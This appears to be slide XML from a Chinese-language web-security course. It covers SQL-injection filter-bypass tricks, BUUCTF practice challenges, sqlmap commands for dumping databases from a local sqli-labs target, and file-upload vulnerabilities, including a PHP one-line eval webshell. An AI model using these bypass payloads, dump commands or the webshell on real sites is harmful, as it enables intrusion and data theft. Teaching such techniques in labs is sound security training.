              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>针对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>WAF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>过滤的字符编码，如使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>编码，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Unicode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>编码，十六进制编码，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Hex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>编码等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>.%0a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>指换行</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>举例：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>union select 1,2,3# = union%0aselect 1\u002c2,3%23</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>双写绕过：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>部分</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>WAF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>只对字符串识别一次，删除敏感字段并拼接剩余语句，这时，我们可以通过双写来进行绕过。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>举例：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>UNIunionON </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SELselectECT anandd</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810" y="509270"/>
            <a:ext cx="6096000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>常用绕过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>trick</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="253365" y="1239520"/>
            <a:ext cx="11617960" cy="3446145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>同义词替换：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>    and=&amp;&amp;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>    or=||</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>    =(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>等于号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>)=&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>空格不能使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>=%09,%0a,%0b,%0c,%0d,%20,%a0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>等</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>%0a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>是换行也可以替代空格</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>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6815" y="1221105"/>
            <a:ext cx="4762500" cy="2586990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>BUUCTF-[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>极客大挑战</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> 2019]LoveSQL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>BUUCTF-[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>极客大挑战</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> 2019]BabySQL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>时间多再做：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>BUUCTF-[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>极客大挑战</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> 2019]HardSQL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1359535" y="509905"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>练习时间</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2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6815" y="1221105"/>
            <a:ext cx="4762500" cy="2586990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>堆叠</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>模糊注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>/like</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>- insert/update/delete</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>- http header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>宽字节</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>- mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>提权</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>。。。。。。</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41120" y="590550"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>使用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839470" y="1183640"/>
            <a:ext cx="10512425" cy="5015865"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>-u:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>用于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>提交方式，后面跟注入的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>网址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>--level</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>--risk</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>--dbs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>：获取所有数据库</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>sqlmap -u "http://localhost/sqli-labs/Less-1/?id=1" --dbs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>--tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>：获取所有数据表</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>sqlmap -u "http://localhost/sqli-labs/Less-1/?id=1" -D mydb --tables</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>--columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>：获取所有字段</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>--dump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>：打印数据</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>sqlmap -u "http://localhost/sqli-labs/Less-1/?id=1" -D mydb -T emp -C ename,job --dump</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>-D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>：查询选择某个库</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>-T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>：查询选择某个表</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>-C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>：查询选择某个字段</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>level</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>：执行测试的等级（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>1~5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>，默认为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>），使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>-level</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>参数并且数值</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>&gt;=2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>的时候会检查</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>里面的参数，</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>当</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>&gt;=3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>时检查</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>user-agent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>refere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>r</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>risk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>：执行测试的风险（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>0~3,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>默认为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>），默认是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>会测试大部分的测试语句，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>会增加基于事件的测试语句，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>会增加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>语句的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="16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p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1.4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件上传</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>漏洞</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285240" y="2008505"/>
            <a:ext cx="8929370" cy="4421505"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1322705" y="1263650"/>
            <a:ext cx="4922520" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>什么地方有文件上传功能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>————</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>点</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1384300" y="509270"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>文件上传功能</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN"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ltLang="zh-CN" dirty="0"/>
              <a:t>1.1.http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协议</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>简介</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3185" y="521970"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>一句话木马</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5186680" y="614045"/>
            <a:ext cx="5059045" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>&lt;?php @eval($_POST(‘cmd’));?&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1273175" y="5233035"/>
            <a:ext cx="7723505" cy="1476375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>&lt;?php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>header("Content-type:text/html;charset=gb1232");</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>echo "&lt;pre&gt;";</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
